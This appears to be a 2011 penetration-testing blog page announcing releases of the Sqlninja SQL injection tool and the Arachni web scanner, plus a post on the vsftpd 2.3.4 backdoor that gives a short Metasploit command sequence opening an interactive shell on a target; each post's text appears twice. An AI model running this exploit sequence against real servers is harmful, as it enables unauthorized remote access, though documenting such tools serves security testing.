... neuere Einträge
Tuesday, 5. July 2011
Sqlninja v.0.2.6-rc1 Linux
Am Tuesday, 5. Jul 2011 im Topic 'Pentest'
Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end.Sqlninja is written in Perl and should run on any UNIX based platform with a Perl interpreter, as long as all needed modules have been installed. So far it has been successfully tested on:
.Linux
.FreeBSD
.Mac OS X
It is basically an official release with all the new features that have been in the SVN for a while (most of them for almost 1 year, ouch). More specifically:
.ICMP-based shell
.CVE-2010-0232 support to escalate the sqlsrvr.exe process to SYSTEM (greetz Tavis)
.Header-based injection support
Download:
http://sqlninja.sourceforge.net/download.html
.Linux
.FreeBSD
.Mac OS X
It is basically an official release with all the new features that have been in the SVN for a while (most of them for almost 1 year, ouch). More specifically:
.ICMP-based shell
.CVE-2010-0232 support to escalate the sqlsrvr.exe process to SYSTEM (greetz Tavis)
.Header-based injection support
Download:
http://sqlninja.sourceforge.net/download.html
Arachni v0.2.4 Security Scanner Linux
Am Tuesday, 5. Jul 2011 im Topic 'Pentest'
Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.
The main focus of this release has been on taking care of some pesky bugs and implementing a few feature requests.
Download: https://github.com/Zapotek/arachni
See Changelog: http://arachni.segfault.gr
The main focus of this release has been on taking care of some pesky bugs and implementing a few feature requests.
Download: https://github.com/Zapotek/arachni
See Changelog: http://arachni.segfault.gr
Video Demonstration : Vsftpd backdoor
Am Tuesday, 5. Jul 2011 im Topic 'Vulnerabilities'
Affected versions :
vsftpd-2.3.4 from 2011-06-30
https://security.appspot.com/vsftpd.html
https://security.appspot.com/downloads/vsftpd-2.3.4.tar.gz
https://security.appspot.com/downloads/vsftpd-2.3.4.tar.gz.asc
http://pastebin.com/AetT9sS5
Metasploit demo :
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST localhost
set PAYLOAD cmd/unix/interact
exploit
id
uname -a
http://www.youtube.com/watch?v=WgXm0tgRMos&feature=player_embedded
discovered by Mathias Kresin
vsftpd-2.3.4 from 2011-06-30
https://security.appspot.com/vsftpd.html
https://security.appspot.com/downloads/vsftpd-2.3.4.tar.gz
https://security.appspot.com/downloads/vsftpd-2.3.4.tar.gz.asc
http://pastebin.com/AetT9sS5
Metasploit demo :
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST localhost
set PAYLOAD cmd/unix/interact
exploit
id
uname -a
http://www.youtube.com/watch?v=WgXm0tgRMos&feature=player_embedded
discovered by Mathias Kresin
... ältere Einträge